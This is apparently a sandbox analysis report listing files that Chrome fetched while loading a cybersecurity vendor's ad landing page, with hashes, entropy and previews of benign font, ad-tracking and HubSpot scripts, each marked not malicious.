                                                                                                                                                                                                                                                                                                                                                                          SHA-512:5A3A0D5077D2CD0962AFC1C49EFF7335EF7B3E5179A198094D019138A7E0613600FF8C9E832D9065DB1F92BF43AE92F9429B623BF58CB0F2D4714D7D582E5460
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:"https://fonts.googleapis.com/css?family=Inter+Tight:100,200,300,400,500,600,700,800,900"
                                                                                                                                                                                                                                                                                                                                                                          Preview:/* cyrillic-ext */.@font-face {. font-family: 'Inter Tight';. font-style: normal;. font-weight: 100;. src: url(https://fonts.gstatic.com/s/intertight/v7/NGSwv5HMAFg6IuGlBNMjxLsK8ah8QA.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Inter Tight';. font-style: normal;. font-weight: 100;. src: url(https://fonts.gstatic.com/s/intertight/v7/NGSwv5HMAFg6IuGlBNMjxLsD8ah8QA.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Inter Tight';. font-style: normal;. font-weight: 100;. src: url(https://fonts.gstatic.com/s/intertight/v7/NGSwv5HMAFg6IuGlBNMjxLsL8ah8QA.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-face {. font-family: 'Inter Tight';. font-style: normal;. font-weight: 100;. src: url(https://fonts.gstatic.com/s/intertight/v7/NGSwv5HMAFg6IuGlBNMjxLs
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (3389), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):3389
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.1514871349348885
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:48:Sudkpwer6dkpw99pcd9Ywmpk0rkpwUMm5rOkpwR/hIbphkkpwBBrYkpwXMm5I:J+en+eNcdBIaeh+eR5SpDeB7e8f
                                                                                                                                                                                                                                                                                                                                                                          MD5:2CF240E4E781BA03E14A191BBE5FBF6B
                                                                                                                                                                                                                                                                                                                                                                          SHA1:492E7643FB8A069EB28463EAB2DF1EEC7984CDBA
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:F5DEE65819F5BEA056EFE6C9819E146E15648ED6770248D07FEDCFF4272CA394
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:C30F41E7ABC7D3B2346743E2542F5FDDBA79DD63934FC4736D43B596C5FA24DB0B41BC881C9774D0A2FE10344BABE6E1FCC174A816BB9AD43E2E9D4ACD38A5D3
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:!function(t,e,r){if(!document.getElementById(t)){var n=document.createElement("script");for(var a in n.src="https://js.hubspot.com/web-interactives-embed.js",n.type="text/javascript",n.id=t,r)r.hasOwnProperty(a)&&n.setAttribute(a,r[a]);var i=document.getElementsByTagName("script")[0];i.parentNode.insertBefore(n,i)}}("hubspot-web-interactives-loader",0,{"crossorigin":"anonymous","data-loader":"hs-scriptloader","data-hsjs-portal":6834707,"data-hsjs-env":"prod","data-hsjs-hublet":"na1"});!function(t,e,r){if(!document.getElementById(t)){var n=document.createElement("script");for(var a in n.src="https://js.usemessages.com/conversations-embed.js",n.type="text/javascript",n.id=t,r)r.hasOwnProperty(a)&&n.setAttribute(a,r[a]);var i=document.getElementsByTagName("script")[0];i.parentNode.insertBefore(n,i)}}("hubspot-messages-loader",0,{"data-loader":"hs-scriptloader","data-hsjs-portal":6834707,"data-hsjs-env":"prod","data-hsjs-hublet":"na1"});!function(e,t){if(!document.getElementById(e)){var c=
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:C++ source, ASCII text, with very long lines (2015)
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):40506
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.518302745738682
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:768:8xMuZ04icWJj1GV2eYcZOYnHKoOFAVUagrLG9JQcgNYTrfgUYyzkoDBRW0sbh3RQ:A+ObYcAYb2Zhd3ZE3
                                                                                                                                                                                                                                                                                                                                                                          MD5:81B0F44C9A10776A781E4CF1119DFCD1
                                                                                                                                                                                                                                                                                                                                                                          SHA1:69285BE8F24E9FFC9B172DEE6530086E583E9A90
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:9F4920BA1903B6827C8E4E00C51ACB76A5B2F49BDDAA35B09D8578CFDFE29D8C
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:A0DDCCDB29D6C029F28818FCECFD6BEA02A77A556E53C417D69F11A496C0D167E7A3E2597B9746BBB57511A191B9AD54BCB011FB6F6059A74DAA8E6AFE579B52
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var m=this||self;const aa=(new Date("2024-01-01T00:00:00Z")).getTime();.function ba(a){a=a.s;const b=encodeURIComponent;let c="";a.platform&&(c+="&uap="+b(a.platform));a.platformVersion&&(c+="&uapv="+b(a.platformVersion));a.uaFullVersion&&(c+="&uafv="+b(a.uaFullVersion));a.architecture&&(c+="&uaa="+b(a.architecture));a.model&&(c+="&uam="+b(a.model));a.bitness&&(c+="&uab="+b(a.bitness));a.fullVersionList&&(c+="&uafvl="+b(a.fullVersionList.map(d=>b(d.brand)+";"+b(d.version)).join("|")));typeof a.wow64!=="undefined"&&(c+="&uaw="+Number(a.wow64));return c}.function ca(a,b){return a.g?a.m.slice(0,a.g.index)+b+a.m.slice(a.g.index):a.m+b}function da(a,b=0){let c="&act=1";b===0?c+="&ri=1":b===1?c+="&ri=24":b===2&&(c+="&ri=25");a.l&&a.s&&(c+=ba(a));a.h&&(c+="&suid="+a.o);return ca(a,c)}function ea(a,b){if(a.l&&a.i){if(b==1)return a.i||""}else if(a.h){if(b==1)return ca(a,"&dct=1&suid="+a.o);if(b==3)re
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):563542
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.691696699892101
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:+/BB2agf6gELfQuLfQethykggjunRI2MqlL6ojtm03L1GgX9in9tYCiTKOnTK8L8:pTf1Gqeplru4
                                                                                                                                                                                                                                                                                                                                                                          MD5:CE26171EFF05376A1B746EFBB809F7F6
                                                                                                                                                                                                                                                                                                                                                                          SHA1:888797DD7B55916C92FC1B1F2249F6A8885C67BB
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:D44882AB82ADEEF2856A0D52FB54BB70E472BE45D50AA3A16B4CB39223391A99
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:8B26CA3A80C4326ED86B3A42DC7A2755BC28E641DA116F95FC3BEB6E12428A03D00F6A949422D3B81EB1CA4FE91AD062C33F55B7D437E68BAA0FAF3C5A333ACC
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://js.hsleadflows.net/leadflows.js
                                                                                                                                                                                                                                                                                                                                                                          Preview:!function(){var e,a,t;null==window.leadflows&&(window.leadflows={});null==(e=window.leadflows).preservedLeadinGlobals&&(e.preservedLeadinGlobals={});null==(a=window.leadflows).preservedOtherGlobals&&(a.preservedOtherGlobals={});t=function(e,a){a[e]=window[e];try{delete window[e];if(window[e])return window[e]=void 0}catch(e){}};window.leadflows.preserveGlobals=function(e,a){var n,i,l,o,s;for(n=0,l=e.length;n<l;n++){s=e[n];t(s,leadflows.preservedLeadinGlobals)}if(a)for(i=0,o=a.length;i<o;i++){s=a[i];t(s,leadflows.preservedOtherGlobals)}}}();leadflows.preserveGlobals(["hns","hns2","jade","I18n","Pikaday","reqwest"],["exports","define"]);window.leadflows=window.leadflows||{};window.leadflows.version="lead-flows-js/static-1.1724/".replace(/\/(static(-\d+\.\d+)?)\//,"-$1");window.MutationObserver=window.MutationObserver||function(e){"use strict";function a(e){this._watched=[];this._listener=e}function t(e){!function t(){var n=e.takeRecords();n.length&&e._listener(n,e);e._timeout=setTimeout(t
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (2343)
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):52916
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.51283890397623
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:768:oHzaMKHBCwsZtisP5XqYofL+qviHOlTjdNoVJDe6VyKaqgYUD0ZTTE8yVfZsk:caMKH125hYiM8O9dNoVJ3N48yVL
                                                                                                                                                                                                                                                                                                                                                                          MD5:575B5480531DA4D14E7453E2016FE0BC
                                                                                                                                                                                                                                                                                                                                                                          SHA1:E5C5F3134FE29E60B591C87EA85951F0AEA36EE1
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:DE36E50194320A7D3EF1ACE9BD34A875A8BD458B253C061979DD628E9BF49AFD
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:174E48F4FB2A7E7A0BE1E16564F9ED2D0BBCC8B4AF18CB89AD49CF42B1C3894C8F8E29CE673BC5D9BC8552F88D1D47294EE0E216402566A3F446F04ACA24857A
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r||u();v=v||q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING||[];w.TAGGING[a]=!0};var ba=Array.isArray,c
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                          MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                          SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, original size modulo 2^32 2097
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):1190
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.831312491646247
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:24:XwmOHj7FVa/ZK+kNJuGiSdAzvMuUMeXhDFW82swoydY/:Xn4a/ZK1Tj+vMzTW82sLP
                                                                                                                                                                                                                                                                                                                                                                          MD5:80D8F4DD25F0D41FC0638E5641734EFE
                                                                                                                                                                                                                                                                                                                                                                          SHA1:9348E64DC4784919748B31B2EFBF2AFF3CCA21C8
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:5E4217B5E343E7F92E36EF0FD485DCDEC6D9801076EDADCED8F6756C94CCA7AA
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:3C674DFD3A8E2586AA80B41B03889C9D6E9E522881F8ABE255838FCE1828D309F6C83824504541AC54F813312F80C79471F5EF9A95912BDD6FE791373FB081B9
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://t.sharethis.com/a/t_.htm?ver=1.1523.23404&cid=c010&cls=C
                                                                                                                                                                                                                                                                                                                                                                          Preview:..........tV.w...."..c$.......!...x@...n.....b.P....g..,t...#......E&M..u..O.,..@..Ir.8.x..m.3C..T.....&..R.....B.....f.KN....x...%_.D..ZjQ.".&6q\...<j..\...h.)1B..}...#..,t8.^..@..k.kS..[j.-..SeY...yyp....K..^tUO.Dg....1.o.v.'.4..9Q/...<.."../!....g.*m...zk4.Df.c..&/...0....M.....".+.+\.U..Ya_../.Sq..Y^....xz.&._ .. ..<....d....!.:...1....+.....;.^../..v..W.q..$q+...@..&.<-.Lg....?.|".....z;..}zRdK.F._..T....2O.m.....8.)..:..X.]..P.(O'...............D......(.K.m`......0....mdQ.w.$W.wo.ft.R.....7..P.U.jB.Xx.....1...t..^7...7....<.U...)ov.....:..[.F.s..0.FQ..dJ.uR...E..z..[.o.@)..Pyftf>.Y........E..p..E.6..j.|y..'LTf.h..j........U...N.g.....u....H.ad.e.7....L..|-s'.....2.k.6.mjs..q}93FJ....8....W..0.....8...d........8.o...+n~C..8.H..7....{......X....#.'d^..c...y.1..G..o.......4G-#D...}.......j.X.F....Sp.@..|..."..L.F.OuoH?C......F.~.W(..5...)....c..(|.,.O..s..2E..|,.b9.....~9.+......2.1...__.qE.}{.sEdR..;.z...2...1<.rq...1.vm3.hjJ..`...p
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):9635
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.28878771663041
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:96:ERExIpr39lQOev/OusA0UKK7mzKTgn2XB:r639lJciT+2YB
                                                                                                                                                                                                                                                                                                                                                                          MD5:C98DA4BC80F6FE14F2941DE8A3BA65A4
                                                                                                                                                                                                                                                                                                                                                                          SHA1:E93D50DA8DCA57A6DC519F493568896FFEE31C2B
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:A7B97F54023A64572F8DBBD95B78058FAE1227725E3B4437C7ACF0F2A6B7928F
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:F38A3103ABBCCA696C2D44FA0FB1E7ACEF0A70B30AE16D6DAD9C62B4739BC6F6CB3EE3E5A2D512C97FF1BA0C5D6D2A3A0870B61182C3D9E8E4CB1F37282322A1
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://x.adroll.com/igs?advertisable=TSSSGOL6MBFETCAHMJBJCQ&fpc=378484b1f0e790975382e6fc128c23d2
                                                                                                                                                                                                                                                                                                                                                                          Preview:[{"owner":"https://x.adroll.com","trustedBiddingSignalsURL":"https://x.adroll.com/kv/v1/getvalues","name":"prospecting","biddingLogicURL":"https://x.adroll.com/bid/bidding-logic.js","biddingWasmHelperURL":"https://x.adroll.com/bid/bidding-logic.wasm","trustedBiddingSignalsKeys":["pRBeVU","pLNIlP","pRppoo","pn8Jc2","poeM7J","p5Z-wu","timestamp"],"updateURL":"https://x.adroll.com/update/prospecting/TSSSGOL6MBFETCAHMJBJCQ?p=BQE3hISx8OeQl1OC5vwSjCPSAAAAAQAILnshAPx0wRnO_HTBGc4","ads":[{"renderURL":"https://x.adroll.com/ads/OuASB12QdC","metadata":"VX_dd728x90"},{"renderURL":"https://x.adroll.com/ads/_1_4yrjCdc","metadata":"VX_dd320x50"},{"renderURL":"https://x.adroll.com/ads/B2Ea1P5kJ5","metadata":"VX_dd970x250"},{"renderURL":"https://x.adroll.com/ads/iURqZL7Lhe","metadata":"VX_dd300x600"},{"renderURL":"https://x.adroll.com/ads/nErCqJt8xt","metadata":"VX_dd300x250"},{"renderURL":"https://x.adroll.com/ads/WveGzu_4JH","metadata":"VX_dd160x600"},{"renderURL":"https://x.adroll.com/ads/b_i9euXwBx
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (4926), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):4926
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.813154445042912
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:96:1gWUfvlcY021mvn1blhad7OIJoodnbUp2dEjkRU2d8Kd3ES9n:1DY0hf1bT47OIqWb1/8KuS9n
                                                                                                                                                                                                                                                                                                                                                                          MD5:91DAFA9C020B65D0A862D03DC334DE55
                                                                                                                                                                                                                                                                                                                                                                          SHA1:B3FD7E454E6F4E4A8AA90A66E51EDDA251F01A7E
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:78F36D56E5CD1A68F147E506F41DF23515C89C2B2453F4FA826C68588F54443B
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:8DCBF51D9E815372E544ED2BF938802299A27D92262BE78159CCAEF9C13B0B66092AA4EA4ACD9B4D0AE1180DDF801E8171A70478D63545059C13E717A9794A1B
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [], baseline, precision 8, 1948x1010, components 3
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):135963
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.73717094462852
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3072:2yDjHCoJNDiaCxVhWgqhCa1zZumzYgoRcimX+6fz:2yDPrmvvsgqoa5gaYVO
                                                                                                                                                                                                                                                                                                                                                                          MD5:83DAA43E5CE8E7F6B5DB68873FF985BA
                                                                                                                                                                                                                                                                                                                                                                          SHA1:9174FD50DAB105951ADEE3E9C08E26E266318811
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:C799B8B9864587FE93299B1A234C202B5A7121FF69B55C17983F6C28E5D3EC75
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:10DF2CF1D62FA942F0671379F90407E7B065874CC3675A098FB2B412EFB38587A5B4C1DD6DF0F770953DFCB6450096D68BDC9C51E6F5F66DF9B1511E240CEF08
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:......JFIF..............ExifMM.*.............................V...........^.(...........1.........f.i.........n....................Picasa............0220.................................... .....!........ASCII...Screenshot7419d9c2852a14870000000000000000...........................2...........:.(.....................B...........P.......H.......H..........JFIF.............C..............................................!........."$".$.......C.......................................................................X...."........................................9.........................!.1.AQ.."2aq.b.#B....R.3r....................................3........................!1AQ..aq..."..#2....Bbr..............?..;.....;9u.E.%.l.Pg|g.9 }H..R(.E...4...I.Y,..[w<.O.s.....}+......Y.t..4.2qF..!.K3[.........[.*.`)....SAi.5...%...p...,......20~n1C..*{G..F+..F.......eHV....-r.T.........>...z.R.{xmm.X.-&..I.\.0..............b.....EdsGzu.O[.$...f.X..3E..4a.....w\y..J...mC..M.e..%..t.2..*..
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                          MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                          SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):13
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):2.7773627950641693
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:qVZPV:qzd
                                                                                                                                                                                                                                                                                                                                                                          MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                                                                                                                                                                                                                          SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://td.doubleclick.net/td/rul/927141988?random=1728897184780&cv=11&fst=1728897184780&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4a90v873384026za200zb810608771&gcd=13r3r3r3r5l1&dma=0&tag_exp=101671035~101686685&u_w=1280&u_h=1024&url=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&ref=https%3A%2F%2Fgoogleads.g.doubleclick.net%2F&hn=www.googleadservices.com&frm=0&tiba=Automating%20Cybersecurity%20%26%20Student%20Safety%20with%20ManagedMethods&did=dZTQ1Zm&gdid=dZTQ1Zm&npa=0&pscdl=noapi&auid=199392175.1728897184&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config
                                                                                                                                                                                                                                                                                                                                                                          Preview:<html></html>
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1055)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):2690
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.39866636776827
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:48:Otg7xBqHIN7QaE9Fa9FZpPiNmgrZyHicju8m5I0zRHkFRCmTx:fN7Qabhiwdicju8WhRHMnTx
                                                                                                                                                                                                                                                                                                                                                                          MD5:76A4D84DE75340D59CA06503A14184D4
                                                                                                                                                                                                                                                                                                                                                                          SHA1:2FE3C4A95AF88BE57D1912BB09DC463F69924402
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:66E9BF446316F6EEC5EAEFA7098592BBD2144A60EB38C481DB233A6CA8B8D94A
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:2ABE6C816B265B72A8023E8F832B9BED0FFD2C931BA07C5DA1AE0CB5D60178CBD1CEA9CE6AE0BB88F77614954C20836342AD6BAFE25EB1CA4D2AEB495E4E2BD2
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://tpc.googlesyndication.com/pagead/js/r20241009/r20110914/client/window_focus_fy2021.js
